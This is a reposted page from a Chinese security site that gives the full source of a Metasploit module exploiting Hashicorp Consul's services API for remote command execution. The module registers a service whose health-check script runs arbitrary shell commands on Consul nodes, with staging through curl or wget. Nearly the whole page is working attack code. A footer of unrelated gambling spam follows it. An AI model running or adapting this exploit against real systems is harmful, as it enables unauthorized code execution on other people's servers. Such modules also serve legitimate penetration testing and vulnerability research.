首頁 | 安全文章 | 安全工具 | Exploits | 本站原創 | 關于我們 | 網站地圖 | 安全論壇
  當前位置:主頁>安全文章>文章資料>Exploits>文章內容
Hashicorp Consul Services API Remote Command Execution
來源:metasploit.com 作者:Kaiser 發布時間:2018-12-29  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Hashicorp Consul Remote Command Execution via Services API",
      'Description'    => %q{
        This module exploits Hashicorp Consul's services API to gain remote command
        execution on Consul nodes.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Bharadwaj Machiraju <bharadwaj.machiraju[at]gmail.com>', # Discovery and PoC
          'Francis Alexander <helofrancis[at]gmail.com >', # Discovery and PoC
          'Quentin Kaiser <kaiserquentin[at]gmail.com>' # Metasploit module
        ],
      'References'     =>
        [
          [ 'URL', 'https://www.consul.io/api/agent/service.html' ],
          [ 'URL', 'https://github.com/torque59/Garfield' ]
        ],
      'Platform'        => 'linux',
      'Targets'         => [ [ 'Linux', {} ] ],
      'Payload'         => {},
      'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'curl', 'wget'],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 11 2018'))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path', '/']),
        OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),
        OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),
        Opt::RPORT(8500)
      ])
  end

  def check
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path, '/v1/agent/self'),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      }
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.code == 200
      vprint_error 'Unexpected reply'
      return CheckCode::Safe
    end

    agent_info = JSON.parse(res.body)

    if agent_info["Config"]["EnableScriptChecks"] == true || agent_info["DebugConfig"]["EnableScriptChecks"] == true || agent_info["DebugConfig"]["EnableRemoteScriptChecks"] == true
      return CheckCode::Vulnerable
    end

    CheckCode::Safe
  rescue JSON::ParserError
    vprint_error 'Failed to parse JSON output.'
    return CheckCode::Unknown
  end

  def execute_command(cmd, opts = {})
    uri = target_uri.path
    service_name = Rex::Text.rand_text_alpha(5..10)
    print_status("Creating service '#{service_name}'")

    # NOTE: Timeout defines how much time the check script will run until
    # getting killed. Arbitrarily set to one day for now.
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, 'v1/agent/service/register'),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      },
      'ctype' => 'application/json',
      'data' => {
        :ID => "#{service_name}",
        :Name => "#{service_name}",
        :Address => "127.0.0.1",
        :Port => 80,
        :check => {
          :script => "#{cmd}",
          :Args => ["sh", "-c", "#{cmd}"],
          :interval => "10s",
          :Timeout => "86400s"
        }
      }.to_json
    })
    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, 'An error occured when contacting the Consul API.')
    end
    print_status("Service '#{service_name}' successfully created.")
    print_status("Waiting for service '#{service_name}' script to trigger")
    sleep(12)
    print_status("Removing service '#{service_name}'")
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(
        uri,
        "v1/agent/service/deregister/#{service_name}"
      ),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      }
    })
    if res && res.code != 200
      fail_with(Failure::UnexpectedReply,
        'An error occured when contacting the Consul API.'
      )
    end
  end

  def exploit
    execute_cmdstager()
  end
end

 
[推薦] [評論(0條)] [返回頂部] [打印本頁] [關閉窗口]  
匿名評論
評論內容:(不能超過250字,需審核后才會公布,請自覺遵守互聯網相關政策法規。
 §最新評論:
  熱點文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相關文章
·WebKit JSC AbstractValue::set
·Hashicorp Consul Rexec Remote
·WebKit JSC JSArray::shiftCount
·NBMonitor Network Bandwidth Mo
·NetworkSleuth 3.0.0.0 Denial O
·Terminal Services Manager 3.1
·EZ CD Audio Converter 8.0.7 De
·Iperius Backup 5.8.1 Buffer Ov
·Ayukov NFTP FTP Client 2.0 Buf
·MAGIX Music Editor 3.1 Buffer
·Vtiger CRM 7.1.0 Remote Code E
·Armitage 1.14.11 Denial Of Ser
  推薦廣告
CopyRight © 2002-2020 VFocuS.Net All Rights Reserved
中彩票的人之前的征兆 山西快乐10分规则 水果拉霸机 彩票大奖得主捐赠 南京麻将app 福彩双色球开奖号码 真人百家乐输钱惨了 体彩天津泳坛夺金 企业管理硕士学校排名 中国虚拟货币交易所 牛牛热 3d彩票投注app官方 喜乐彩组合投注技巧 老11选5作弊器 余额宝理财收益率怎么算的 扑克麻将怎么发牌 体彩中奖号码查询17326